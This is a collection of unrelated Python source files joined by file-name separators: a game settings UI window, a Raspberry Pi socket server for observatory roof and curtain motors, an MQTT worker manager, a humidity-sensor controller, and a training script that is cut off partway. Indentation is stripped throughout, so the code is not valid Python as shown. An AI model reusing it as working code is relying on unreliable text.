# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# -----------------------------------------------------------------------------
"""UI for top level settings categories."""
from __future__ import annotations
from typing import TYPE_CHECKING
import _ba
import ba
if TYPE_CHECKING:
from typing import Tuple, Optional, Union
class AllSettingsWindow(ba.Window):
"""Window for selecting a settings category."""
def __init__(self,
transition: str = 'in_right',
origin_widget: ba.Widget = None):
# pylint: disable=too-many-statements
# pylint: disable=too-many-locals
import threading
# Preload some modules we use in a background thread so we won't
# have a visual hitch when the user taps them.
threading.Thread(target=self._preload_modules).start()
ba.set_analytics_screen('Settings Window')
scale_origin: Optional[Tuple[float, float]]
if origin_widget is not None:
self._transition_out = 'out_scale'
scale_origin = origin_widget.get_screen_space_center()
transition = 'in_scale'
else:
self._transition_out = 'out_right'
scale_origin = None
uiscale = ba.app.uiscale
width = 900 if uiscale is ba.UIScale.SMALL else 580
x_inset = 75 if uiscale is ba.UIScale.SMALL else 0
height = 435
# button_height = 42
self._r = 'settingsWindow'
top_extra = 20 if uiscale is ba.UIScale.SMALL else 0
uiscale = ba.app.uiscale
super().__init__(root_widget=ba.containerwidget(
size=(width, height + top_extra),
transition=transition,
toolbar_visibility='menu_minimal',
scale_origin_stack_offset=scale_origin,
scale=(1.75 if uiscale is ba.UIScale.SMALL else
1.35 if uiscale is ba.UIScale.MEDIUM else 1.0),
stack_offset=(0, -8) if uiscale is ba.UIScale.SMALL else (0, 0)))
if ba.app.toolbars and uiscale is ba.UIScale.SMALL:
self._back_button = None
ba.containerwidget(edit=self._root_widget,
on_cancel_call=self._do_back)
else:
self._back_button = btn = ba.buttonwidget(
parent=self._root_widget,
autoselect=True,
position=(40 + x_inset, height - 55),
size=(130, 60),
scale=0.8,
text_scale=1.2,
label=ba.Lstr(resource='backText'),
button_type='back',
on_activate_call=self._do_back)
ba.containerwidget(edit=self._root_widget, cancel_button=btn)
ba.textwidget(parent=self._root_widget,
position=(0, height - 44),
size=(width, 25),
text=ba.Lstr(resource=self._r + '.titleText'),
color=ba.app.title_color,
h_align='center',
v_align='center',
maxwidth=130)
if self._back_button is not None:
ba.buttonwidget(edit=self._back_button,
button_type='backSmall',
size=(60, 60),
label=ba.charstr(ba.SpecialChar.BACK))
v = height - 80
v -= 145
basew = 280 if uiscale is ba.UIScale.SMALL else 230
baseh = 170
x_offs = x_inset + (105 if uiscale is ba.UIScale.SMALL else
72) - basew # now unused
x_offs2 = x_offs + basew - 7
x_offs3 = x_offs + 2 * (basew - 7)
x_offs4 = x_offs2
x_offs5 = x_offs3
def _b_title(x: float, y: float, button: ba.Widget,
text: Union[str, ba.Lstr]) -> None:
ba.textwidget(parent=self._root_widget,
text=text,
position=(x + basew * 0.47, y + baseh * 0.22),
maxwidth=basew * 0.7,
size=(0, 0),
h_align='center',
v_align='center',
draw_controller=button,
color=(0.7, 0.9, 0.7, 1.0))
ctb = self._controllers_button = ba.buttonwidget(
parent=self._root_widget,
autoselect=True,
position=(x_offs2, v),
size=(basew, baseh),
button_type='square',
label='',
on_activate_call=self._do_controllers)
if ba.app.toolbars and self._back_button is None:
bbtn = _ba.get_special_widget('back_button')
ba.widget(edit=ctb, left_widget=bbtn)
_b_title(x_offs2, v, ctb,
ba.Lstr(resource=self._r + '.controllersText'))
imgw = imgh = 130
ba.imagewidget(parent=self._root_widget,
position=(x_offs2 + basew * 0.49 - imgw * 0.5, v + 35),
size=(imgw, imgh),
texture=ba.gettexture('controllerIcon'),
draw_controller=ctb)
gfxb = self._graphics_button = ba.buttonwidget(
parent=self._root_widget,
autoselect=True,
position=(x_offs3, v),
size=(basew, baseh),
button_type='square',
label='',
on_activate_call=self._do_graphics)
if ba.app.toolbars:
pbtn = _ba.get_special_widget('party_button')
ba.widget(edit=gfxb, up_widget=pbtn, right_widget=pbtn)
_b_title(x_offs3, v, gfxb, ba.Lstr(resource=self._r + '.graphicsText'))
imgw = imgh = 110
ba.imagewidget(parent=self._root_widget,
position=(x_offs3 + basew * 0.49 - imgw * 0.5, v + 42),
size=(imgw, imgh),
texture=ba.gettexture('graphicsIcon'),
draw_controller=gfxb)
v -= (baseh - 5)
abtn = self._audio_button = ba.buttonwidget(
parent=self._root_widget,
autoselect=True,
position=(x_offs4, v),
size=(basew, baseh),
button_type='square',
label='',
on_activate_call=self._do_audio)
_b_title(x_offs4, v, abtn, ba.Lstr(resource=self._r + '.audioText'))
imgw = imgh = 120
ba.imagewidget(parent=self._root_widget,
position=(x_offs4 + basew * 0.49 - imgw * 0.5 + 5,
v + 35),
size=(imgw, imgh),
color=(1, 1, 0),
texture=ba.gettexture('audioIcon'),
draw_controller=abtn)
avb = self._advanced_button = ba.buttonwidget(
parent=self._root_widget,
autoselect=True,
position=(x_offs5, v),
size=(basew, baseh),
button_type='square',
label='',
on_activate_call=self._do_advanced)
_b_title(x_offs5, v, avb, ba.Lstr(resource=self._r + '.advancedText'))
imgw = imgh = 120
ba.imagewidget(parent=self._root_widget,
position=(x_offs5 + basew * 0.49 - imgw * 0.5 + 5,
v + 35),
size=(imgw, imgh),
color=(0.8, 0.95, 1),
texture=ba.gettexture('advancedIcon'),
draw_controller=avb)
@staticmethod
def _preload_modules() -> None:
"""For preloading modules we use in a bg thread to prevent hitches."""
import bastd.ui.mainmenu as _unused1
import bastd.ui.settings.controls as _unused2
import bastd.ui.settings.graphics as _unused3
import bastd.ui.settings.audio as _unused4
import bastd.ui.settings.advanced as _unused5
def _do_back(self) -> None:
# pylint: disable=cyclic-import
from bastd.ui.mainmenu import MainMenuWindow
self._save_state()
ba.containerwidget(edit=self._root_widget,
transition=self._transition_out)
ba.app.main_menu_window = (MainMenuWindow(
transition='in_left').get_root_widget())
def _do_controllers(self) -> None:
# pylint: disable=cyclic-import
from bastd.ui.settings.controls import ControlsSettingsWindow
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
ba.app.main_menu_window = (ControlsSettingsWindow(
origin_widget=self._controllers_button).get_root_widget())
def _do_graphics(self) -> None:
# pylint: disable=cyclic-import
from bastd.ui.settings.graphics import GraphicsSettingsWindow
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
ba.app.main_menu_window = (GraphicsSettingsWindow(
origin_widget=self._graphics_button).get_root_widget())
def _do_audio(self) -> None:
# pylint: disable=cyclic-import
from bastd.ui.settings.audio import AudioSettingsWindow
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
ba.app.main_menu_window = (AudioSettingsWindow(
origin_widget=self._audio_button).get_root_widget())
def _do_advanced(self) -> None:
# pylint: disable=cyclic-import
from bastd.ui.settings.advanced import AdvancedSettingsWindow
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
ba.app.main_menu_window = (AdvancedSettingsWindow(
origin_widget=self._advanced_button).get_root_widget())
def _save_state(self) -> None:
try:
sel = self._root_widget.get_selected_child()
if sel == self._controllers_button:
sel_name = 'Controllers'
elif sel == self._graphics_button:
sel_name = 'Graphics'
elif sel == self._audio_button:
sel_name = 'Audio'
elif sel == self._advanced_button:
sel_name = 'Advanced'
elif sel == self._back_button:
sel_name = 'Back'
else:
raise ValueError(f'unrecognized selection \'{sel}\'')
ba.app.window_states[self.__class__.__name__] = {
'sel_name': sel_name
}
except Exception:
ba.print_exception(f'Error saving state for {self}.')
def _restore_state(self) -> None:
try:
sel_name = ba.app.window_states.get(self.__class__.__name__,
{}).get('sel_name')
sel: Optional[ba.Widget]
if sel_name == 'Controllers':
sel = self._controllers_button
elif sel_name == 'Graphics':
sel = self._graphics_button
elif sel_name == 'Audio':
sel = self._audio_button
elif sel_name == 'Advanced':
sel = self._advanced_button
elif sel_name == 'Back':
sel = self._back_button
else:
sel = self._controllers_button
if sel is not None:
ba.containerwidget(edit=self._root_widget, selected_child=sel)
except Exception:
ba.print_exception(f'Error restoring state for {self}.')
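# A minimal sketch of how this window is typically swapped in from another
# ba.Window (it mirrors the _do_* handlers above; the originating button
# name is hypothetical):
# ba.app.main_menu_window = AllSettingsWindow(
#     origin_widget=settings_button).get_root_widget()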
|
checker_server.py
|
import getopt
import socket
import sys
from threading import Thread
from gpiozero import RotaryEncoder, OutputDevice, Motor, DigitalInputDevice
from time import sleep
from config import Config
from logger import Logger
def convert_steps(steps):
return f'{steps:04}'
def when_rotated(rotary_encoder):
Logger.getLogger().info(f"Step: %s", rotary_encoder.steps)
def __rotate__(*inputs):
[input.pin.drive_low() for input in inputs]
[input.pin.drive_high() for input in inputs]
def __fake_move_forward__(pin_a, pin_b):
sleep(0.2)
__rotate__(pin_a, pin_b)
Logger.getLogger().debug("Clock Wise")
# curtain.__check_curtains_limit__()
def __fake_move_backward__(pin_a, pin_b):
sleep(0.2)
__rotate__(pin_b, pin_a)
Logger.getLogger().debug("Counter Clock Wise")
# curtain.__check_curtains_limit__()
def __motor_thread__(motor, pin_a, pin_b):
while True:
while motor.is_active:
Logger.getLogger().debug("Motor value = %s", motor.value)
if motor.value == 1:
__fake_move_forward__(pin_a, pin_b)
else:
__fake_move_backward__(pin_a, pin_b)
MOCK: bool = False
HOST: str = Config.getValue("loopback_ip", "server")
PORT: int = Config.getInt("port", "server")
try:
opts, _ = getopt.getopt(sys.argv[1:], "m", ["mock"])
except getopt.GetoptError:
Logger.getLogger().exception("parametri errati")
exit(2) # exit the application with an error
for opt, _1 in opts:
if opt in ('-m', '--mock'):
MOCK = True
from gpiozero import Device
from gpiozero.pins.mock import MockFactory
if Device.pin_factory is not None:
Device.pin_factory.reset()
Device.pin_factory = MockFactory()
step_sicurezza = Config.getInt("n_step_sicurezza", "encoder_step")
error_level: int = 0
east_rotary_encoder = RotaryEncoder(
Config.getInt("clk_e", "encoder_board"),
Config.getInt("dt_e", "encoder_board"),
max_steps=step_sicurezza,
wrap=True
)
west_rotary_encoder = RotaryEncoder(
Config.getInt("clk_w", "encoder_board"),
Config.getInt("dt_w", "encoder_board"),
max_steps=step_sicurezza,
wrap=True
)
east_rotary_encoder.steps = 0
west_rotary_encoder.steps = 0
east_rotary_encoder.when_rotated = when_rotated
west_rotary_encoder.when_rotated = when_rotated
motor_roof = OutputDevice(Config.getInt("switch_roof", "roof_board"))
panel_flat = OutputDevice(Config.getInt("switch_panel", "panel_board"))
switch_power_tele = OutputDevice(Config.getInt("switch_power", "panel_board"))
switch_light = OutputDevice(Config.getInt("switch_light", "panel_board"))
switch_aux = OutputDevice(Config.getInt("switch_aux", "panel_board"))
motor_east = Motor(
Config.getInt("motorE_A", "motor_board"),
Config.getInt("motorE_B", "motor_board"),
Config.getInt("motorE_E", "motor_board"),
pwm=False
)
motor_west = Motor(
Config.getInt("motorW_A", "motor_board"),
Config.getInt("motorW_B", "motor_board"),
Config.getInt("motorW_E", "motor_board"),
pwm=False
)
if MOCK:
thread_east = Thread(target=__motor_thread__, args=(motor_east, east_rotary_encoder.a, east_rotary_encoder.b))
thread_east.start()
thread_west = Thread(target=__motor_thread__, args=(motor_west, west_rotary_encoder.a, west_rotary_encoder.b))
thread_west.start()
roof_closed_switch = DigitalInputDevice(Config.getInt("roof_verify_closed", "roof_board"), pull_up=True)
roof_open_switch = DigitalInputDevice(Config.getInt("roof_verify_open", "roof_board"), pull_up=True)
east_curtain_closed = DigitalInputDevice(Config.getInt("curtain_E_verify_closed", "curtains_limit_switch"), pull_up=True)
east_curtain_open = DigitalInputDevice(Config.getInt("curtain_E_verify_open", "curtains_limit_switch"), pull_up=True)
west_curtain_closed = DigitalInputDevice(Config.getInt("curtain_W_verify_closed", "curtains_limit_switch"), pull_up=True)
west_curtain_open = DigitalInputDevice(Config.getInt("curtain_W_verify_open", "curtains_limit_switch"), pull_up=True)
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind((HOST, PORT))
s.listen()
Logger.getLogger().info("Server avviato")
while True:
conn, _ = s.accept()
with conn:
while True:
data = conn.recv(7).decode("UTF-8")
Logger.getLogger().debug("Data: %s", data)
if data:
roof = data[0]
panel = data[1]
power_tele = data[2]
light = data[3]
power_ccd = data[4]
curtain_west = data[5]
curtain_east = data[6]
else:
try:
conn.close()
finally:
break
# ROOF
if roof == 'O':
Logger.getLogger().debug("test apertura tetto")
motor_roof.on()
Logger.getLogger().debug("MOTORE TETTO: %s", motor_roof.value)
if roof == 'C':
Logger.getLogger().debug("test chiusura tetto")
motor_roof.off()
Logger.getLogger().debug("MOTORE TETTO: %s", motor_roof.value)
# PANEL FLAT
if panel == 'A':
Logger.getLogger().debug("test accensione pannello flat")
panel_flat.on()
Logger.getLogger().debug("PANEL FLAT: %s", panel_flat.value)
if panel == 'S':
Logger.getLogger().debug("test spegnimento panel flat")
panel_flat.off()
Logger.getLogger().debug("PANEL FLAT: %s", panel_flat.value)
# POWER SWITCH TELE
if power_tele == 'A':
Logger.getLogger().debug("test accensione alimentatore telescopio")
switch_power_tele.on()
Logger.getLogger().debug("ALIMENTATORE TELE: %s", switch_power_tele.value)
if power_tele == 'S':
Logger.getLogger().debug("test spegnimento alimentatore telescopio")
switch_power_tele.off()
Logger.getLogger().debug("ALIMENTATORE TELE: %s", switch_power_tele.value)
# LIGHT
if light == 'A':
Logger.getLogger().debug("test accensioni luci cupola ")
switch_light.on()
Logger.getLogger().debug("LUCI CUPOLA: %s", switch_light.value)
if light == 'S':
Logger.getLogger().debug("test spegnimento luci cupola ")
switch_light.off()
Logger.getLogger().debug("LUCI CUPOLA: %s", switch_light.value)
# POWER SWITCH CCD
if power_ccd == 'A':
Logger.getLogger().debug("test accensione alimentatore CCD ")
switch_aux.on()
Logger.getLogger().debug("ALIMENTATORE CCD: %s", switch_aux.value)
if power_ccd == 'S':
Logger.getLogger().debug("test spegnimento alimentatore CCD ")
switch_aux.off()
Logger.getLogger().debug("ALIMENTATORE CCD: %s", switch_aux.value)
if curtain_west == 'O':
Logger.getLogger().debug("chiamata del metodo per apertura tenda west (automazioneTende.open_all_curtains.curtain_west.open_up) ")
motor_west.forward()
if curtain_west == 'C':
Logger.getLogger().debug("chiamata del metodo per chiusura tenda west (automazioneTende.open_all_curtains.curtain_west.bring_down) ")
motor_west.backward()
if curtain_west == 'S':
Logger.getLogger().debug("metodo per stop tenda west in stand-by ")
motor_west.stop()
if curtain_east == 'O':
Logger.getLogger().debug("chiamata del metodo per apertura tenda east (automazioneTende.open_all_curtains.curtain_east.open_up) ")
motor_east.forward()
if curtain_east == 'C':
Logger.getLogger().debug("chiamata del metodo per chiusura tenda east (automazioneTende.open_all_curtains.curtain_east.bring_down) ")
motor_east.backward()
if curtain_east == 'S':
Logger.getLogger().debug("metodo per stop tenda east in stand-by ")
motor_east.stop()
wa = motor_west.forward_device.value
wb = motor_west.backward_device.value
we = motor_west.enable_device.value
Logger.getLogger().debug("Tenda west A: %s", motor_west.forward_device.value)
Logger.getLogger().debug("Tenda west B: %s", motor_west.backward_device.value)
Logger.getLogger().debug("Tenda west E: %s", motor_west.enable_device.value)
if wa and not wb and we:
curtain_west = "O"
elif not wa and wb and we:
curtain_west = "C"
elif not wa and not wb and not we:
curtain_west = "S"
else:
Exception("ERROR WEST CURTAIN")
ea = motor_east.forward_device.value
eb = motor_east.backward_device.value
ee = motor_east.enable_device.value
Logger.getLogger().debug("Tenda east A: %s", motor_east.forward_device.value)
Logger.getLogger().debug("Tenda east B: %s", motor_east.backward_device.value)
Logger.getLogger().debug("Tenda east E: %s", motor_east.enable_device.value)
if ea and not eb and ee:
curtain_east = "O"
elif not ea and eb and ee:
curtain_east = "C"
elif not ea and not eb and not ee:
curtain_east = "S"
else:
Exception("ERROR EAST CURTAIN")
# verify roof status
roof_status = 1 if motor_roof.is_active else 0
# verify motor West status
motor_west_status = 2 if motor_west.value == -1 else motor_west.value
# verify motor East status
motor_east_status = 2 if motor_east.value == -1 else motor_east.value
# verify whether the roof is open or closed
sor = 1 if roof_open_switch.is_active else 0
scr = 1 if roof_closed_switch.is_active else 0
# verify whether the west curtain is open or closed
sow = 1 if west_curtain_open.is_active else 0
scw = 1 if west_curtain_closed.is_active else 0
# verify whether the east curtain is open or closed
soe = 1 if east_curtain_open.is_active else 0
sce = 1 if east_curtain_closed.is_active else 0
# encoder step counts (east and west)
nee = convert_steps(east_rotary_encoder.steps)
nwe = convert_steps(west_rotary_encoder.steps)
panel_status = 1 if panel_flat.is_active else 0
power_tele_status = 1 if switch_power_tele.is_active else 0
light_status = 1 if switch_light.is_active else 0
switch_aux_status = 1 if switch_aux.is_active else 0
test_status = (
str(roof_status) +
str(motor_west_status) +
str(motor_east_status) +
str(sor) + str(scr) +
str(sow) + str(scw) +
str(soe) + str(sce) +
str(nwe) + str(nee) +
str(panel_status) +
str(power_tele_status) +
str(light_status) +
str(switch_aux_status)
)
Logger.getLogger().info("test_status: %s", test_status)
Logger.getLogger().info("Encoder est: %s", nee)
Logger.getLogger().info("Encoder west: %s", nwe)
conn.sendall(test_status.encode("UTF-8"))
except (KeyboardInterrupt, SystemExit) as e:
Logger.getLogger().info("Intercettato CTRL+C: " + str(e))
except Exception as e:
Logger.getLogger().exception("altro errore: " + str(e))
error_level = -1
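# A minimal test-client sketch for the 7-character protocol handled above
# (host and port are placeholders; in the real setup they come from Config).
# Command characters, in order: roof (O/C), flat panel (A/S), telescope power
# (A/S), dome light (A/S), CCD power (A/S), west curtain (O/C/S), east curtain (O/C/S).
def example_client(host="127.0.0.1", port=5000):  # assumed address and port
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client:
        client.connect((host, port))
        client.sendall("OAAAAOO".encode("UTF-8"))  # open roof and both curtains, switch everything on
        return client.recv(32).decode("UTF-8")     # the packed test_status string sent back by the server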
|
workers_manager.py
|
import importlib
import inspect
import threading
from functools import partial
from apscheduler.schedulers.background import BackgroundScheduler
from interruptingcow import timeout
from pytz import utc
from const import DEFAULT_COMMAND_TIMEOUT, DEFAULT_COMMAND_RETRIES, DEFAULT_UPDATE_RETRIES
from exceptions import WorkerTimeoutError
from workers_queue import _WORKERS_QUEUE
import logger
_LOGGER = logger.get(__name__)
class WorkersManager:
class Command:
def __init__(self, callback, timeout, args=(), options=dict()):
self._callback = callback
self._timeout = timeout
self._args = args
self._options = options
self._source = "{}.{}".format(
callback.__self__.__class__.__name__
if hasattr(callback, "__self__")
else callback.__module__,
callback.__name__,
)
def execute(self):
messages = []
try:
with timeout(
self._timeout,
exception=WorkerTimeoutError(
"Execution of command {} timed out after {} seconds".format(
self._source, self._timeout
)
),
):
if inspect.isgeneratorfunction(self._callback):
for message in self._callback(*self._args):
messages += message
else:
messages = self._callback(*self._args)
except WorkerTimeoutError as e:
if messages:
logger.log_exception(
_LOGGER, "%s, sending only partial update", e, suppress=True
)
else:
raise e
_LOGGER.debug("Execution result of command %s: %s", self._source, messages)
return messages
def __init__(self, config):
self._mqtt_callbacks = []
self._config_commands = []
self._update_commands = []
self._scheduler = BackgroundScheduler(timezone=utc)
self._daemons = []
self._config = config
self._command_timeout = config.get("command_timeout", DEFAULT_COMMAND_TIMEOUT)
self._command_retries = config.get("command_retries", DEFAULT_COMMAND_RETRIES)
self._update_retries = config.get("update_retries", DEFAULT_UPDATE_RETRIES)
def register_workers(self, global_topic_prefix):
for (worker_name, worker_config) in self._config["workers"].items():
module_obj = importlib.import_module("workers.%s" % worker_name)
klass = getattr(module_obj, "%sWorker" % worker_name.title())
command_timeout = worker_config.get(
"command_timeout", self._command_timeout
)
command_retries = worker_config.get(
"command_retries", self._command_retries
)
update_retries = worker_config.get(
"update_retries", self._update_retries
)
worker_obj = klass(
command_timeout, command_retries, update_retries, global_topic_prefix, **worker_config["args"]
)
if "sensor_config" in self._config and hasattr(worker_obj, "config"):
_LOGGER.debug(
"Added %s config with a %d seconds timeout", repr(worker_obj), 2
)
command = self.Command(worker_obj.config, 2, [])
self._config_commands.append(command)
if hasattr(worker_obj, "status_update"):
_LOGGER.debug(
"Added %s worker with %d seconds interval and a %d seconds timeout",
repr(worker_obj),
worker_config["update_interval"],
worker_obj.command_timeout,
)
command = self.Command(
worker_obj.status_update, worker_obj.command_timeout, []
)
self._update_commands.append(command)
if "update_interval" in worker_config:
job_id = "{}_interval_job".format(worker_name)
self._scheduler.add_job(
partial(self._queue_command, command),
"interval",
seconds=worker_config["update_interval"],
id=job_id,
)
self._mqtt_callbacks.append(
(
worker_obj.format_topic("update_interval"),
partial(self._update_interval_wrapper, command, job_id),
)
)
elif hasattr(worker_obj, "run"):
_LOGGER.debug("Registered %s as daemon", repr(worker_obj))
self._daemons.append(worker_obj)
else:
raise "%s cannot be initialized, it has to define run or status_update method" % worker_name
if "topic_subscription" in worker_config:
self._mqtt_callbacks.append(
(
worker_config["topic_subscription"],
partial(self._on_command_wrapper, worker_obj),
)
)
if "topic_subscription" in self._config:
for (callback_name, options) in self._config["topic_subscription"].items():
self._mqtt_callbacks.append(
(
options["topic"],
lambda client, _, c: self._queue_if_matching_payload(
self.Command(
getattr(self, callback_name), self._command_timeout
),
c.payload,
options["payload"],
),
)
)
def start(self, mqtt):
mqtt.callbacks_subscription(self._mqtt_callbacks)
if "sensor_config" in self._config:
self._publish_config(mqtt)
self._scheduler.start()
self.update_all()
for daemon in self._daemons:
threading.Thread(target=daemon.run, args=[mqtt], daemon=True).start()
def _queue_if_matching_payload(self, command, payload, expected_payload):
if payload.decode("utf-8") == expected_payload:
self._queue_command(command)
def update_all(self):
_LOGGER.debug("Updating all workers")
for command in self._update_commands:
self._queue_command(command)
@staticmethod
def _queue_command(command):
_WORKERS_QUEUE.put(command)
def _update_interval_wrapper(self, command, job_id, client, userdata, c):
_LOGGER.info("Recieved updated interval for %s with: %s", c.topic, c.payload)
try:
new_interval = int(c.payload)
self._scheduler.remove_job(job_id)
self._scheduler.add_job(
partial(self._queue_command, command),
"interval",
seconds=new_interval,
id=job_id,
)
except ValueError:
logger.log_exception(
_LOGGER, "Ignoring invalid new interval: %s", c.payload
)
def _on_command_wrapper(self, worker_obj, client, userdata, c):
_LOGGER.debug(
"Received command for %s on %s: %s", repr(worker_obj), c.topic, c.payload
)
global_topic_prefix = userdata["global_topic_prefix"]
topic = (
c.topic[len(global_topic_prefix + "/"):]
if global_topic_prefix is not None
else c.topic
)
self._queue_command(
self.Command(
worker_obj.on_command, worker_obj.command_timeout, [topic, c.payload]
)
)
def _publish_config(self, mqtt):
for command in self._config_commands:
messages = command.execute()
for msg in messages:
msg.topic = "{}/{}".format(
self._config["sensor_config"].get("topic", "homeassistant"),
msg.topic,
)
msg.retain = self._config["sensor_config"].get("retain", True)
mqtt.publish(messages)
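# A rough sketch of the configuration shape register_workers() expects
# (the worker name, args and topics below are made up for illustration):
# config = {
#     "command_timeout": 35,
#     "sensor_config": {"topic": "homeassistant", "retain": True},
#     "workers": {
#         "example": {                       # resolved to workers.example.ExampleWorker
#             "args": {"devices": {}},
#             "update_interval": 300,
#             "topic_subscription": "example/+/set",
#         },
#     },
# }
# manager = WorkersManager(config)
# manager.register_workers(global_topic_prefix="home")
# manager.start(mqtt)  # mqtt must expose callbacks_subscription() and publish()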
|
controller.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import RPi.GPIO as GPIO # Import Raspberry Pi GPIO library
import time,threading
import os
import sys
import Adafruit_DHT
import syslog
from mikezlcd import *
lcd = lcd_module(2004, 25, 24, 22, 18, 17,23)
lcd.disp(0,0,"Booting...")
import psycopg2
try:
f = open("/etc/dbconn.txt", "r")
dsn=f.readline().strip()
SENSORID=f.readline().strip()
f.close()
except:
syslog.syslog("Could not open dbconn.txt")
sys.exit(2)
if dsn!= 'NODB':
CONN = psycopg2.connect(dsn)
CUR=CONN.cursor()
syslog.syslog("Connected to database")
DBWAIT=10*60
else:
syslog.syslog("Not using database")
CONN=None
CUR=None
DBWAIT=0
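# Expected layout of /etc/dbconn.txt (values are placeholders): the first line
# is a psycopg2 DSN, the second line the sensor id; a first line of 'NODB'
# disables database logging entirely.
#
#   dbname=measures user=pi password=secret host=localhost
#   42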
DHTSENSOR = Adafruit_DHT.DHT22
DHTPIN = 4
BTPIN=7
LEDPIN=8
ONTIME=1200.0
payload=0
lastpush=0
turnofftimer=None
TIMEFORMAT="%Y/%m/%d %H:%M:%S"
DHTWAIT=30
SQL="insert into measure(sensorid,value,type,aux,payload) values(%s,%s,%s,%s,%s)"
lastdb=0
def fmttime(timefloat):
return time.strftime(TIMEFORMAT,time.localtime(timefloat))
def button_callback(channel): # Being run when BTPIN is pulled high
global LEDPIN
global lastpush
global turnofftimer
now=time.time()
#print(fmttime(now))
if now - lastpush < 1: # Debouncing
syslog.syslog("Early push detected")
return
lastpush=now
state=GPIO.input(LEDPIN)
if state==0:
GPIO.output(LEDPIN,GPIO.HIGH)
turnofftimer = threading.Timer(ONTIME, turnoff)
turnofftimer.start()
syslog.syslog("Turned ON")
else:
turnoff()
def handleht(hum,temp,mintemp,maxtemp):
global lcd
global lastdb
global payload
now=time.time()
if DBWAIT > 0 and lastdb+DBWAIT < now:
syslog.syslog("Storing data in DB")
payload+=1
CUR.execute(SQL,(SENSORID,round(hum,2),104,99,payload))
CUR.execute(SQL,(SENSORID,round(temp,2),116,99,payload))
CONN.commit()
lastdb=now
syslog.syslog("Humidity : {:4.1f} %".format(hum))
syslog.syslog("Temperature : {:4.1f} °C".format(temp))
lcd.disp(0,0,"Temp {:5.1f} oC".format(temp))
lcd.disp(0,1," {:5.1f} - {:5.1f}".format(mintemp,maxtemp))
lcd.disp(0,2,"Fukt {:5.1f} %".format(hum))
lcd.disp(0,3,fmttime(now))
def turnoff():
global LEDPIN
syslog.syslog("Turning OFF")
#print(fmttime(time.time()))
GPIO.output(LEDPIN,GPIO.LOW)
if turnofftimer is not None:
turnofftimer.cancel() # Do not want to have a timer hanging around to turn off the led later on.
def readDHT(evt):
global DHTSENSOR
global DHTPIN
global DHTWAIT
mintemp=100
maxtemp=-100
dhtread=0
while True:
if evt.isSet():
return()
now=time.time()
if now-dhtread>DHTWAIT: # Cannot sleep for DHTWAIT as that would block processing of the stop event
syslog.syslog("Reading DHT")
dhtread=now
try:
humidity, temperature = Adafruit_DHT.read_retry(DHTSENSOR, DHTPIN)
mintemp=min(mintemp,temperature)
maxtemp=max(maxtemp,temperature)
handleht(humidity,temperature,mintemp,maxtemp)
if evt.isSet():
return()
if humidity>75:
state=GPIO.input(LEDPIN)
if not state==0:
syslog.syslog("Too humid, turning off")
turnoff()
except:
#syslog.syslog(fmttime(time.time()))
syslog.syslog("Problem reading DHT")
pass
time.sleep(1)
GPIO.setwarnings(False) # Ignore warning for now
#GPIO.setmode(GPIO.BOARD) # Use physical pin numbering
GPIO.setup(BTPIN, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) # Set BTPIN to be an input pin and set initial value to be pulled low (off)
GPIO.setup(LEDPIN,GPIO.OUT)
GPIO.output(LEDPIN,GPIO.LOW) # Want to make sure we start in a known state
GPIO.add_event_detect(BTPIN,GPIO.RISING,callback=button_callback) # Set up an event on the BTPIN rising edge
stopDHT=threading.Event()
DHTthread=threading.Thread(target = readDHT, args = (stopDHT, ))
DHTthread.start()
syslog.syslog("Up running")
while True:
time.sleep(1)
try:
os.remove("/tmp/STOPME")
syslog.syslog("Quitting now")
break
except:
pass
stopDHT.set()
DHTthread.join()
turnoff()
GPIO.cleanup() # Clean up
|
train_hybrid.py
|
#!/usr/bin/env python
"""
Main training workflow
"""
from __future__ import division
import argparse
import glob
import os
import random
import signal
import time
import torch
import distributed
from pytorch_transformers import BertTokenizer
from models import data_loader, model_builder
from models.data_loader import load_dataset
from models.model_builder import ExtSummarizer, HybridSummarizer
from models.loss import abs_loss
from models.trainer import build_trainer
from models.predictor_copy import build_predictor
from others.logging import logger, init_logger
model_flags = ['hidden_size', 'ff_size', 'heads', 'inter_layers', 'encoder', 'ff_actv', 'use_interval', 'rnn_size']
# symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
# 'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
def train_multi_hybrid(args):
""" Spawns 1 process per GPU """
# spawn one process per gpu
init_logger()
# number of gpus
nb_gpu = args.world_size
# use the spawn start method for multiprocessing
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(nb_gpu):
device_id = i
# add a new process that runs the run function; device_id is the corresponding gpu
procs.append(mp.Process(target=run, args=(args,
device_id, error_queue,), daemon=True))
procs[i].start()
logger.info(" Starting process pid: %d " % procs[i].pid)
# let the error handler watch the child processes
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(args, device_id, error_queue):
""" run process """
setattr(args, 'gpu_ranks', [int(i) for i in args.gpu_ranks])
try:
gpu_rank = distributed.multi_init(device_id, args.world_size, args.gpu_ranks)
print('gpu_rank %d' % gpu_rank)
if gpu_rank != args.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
# then fall through to training a single model
train_single_hybrid(args, device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
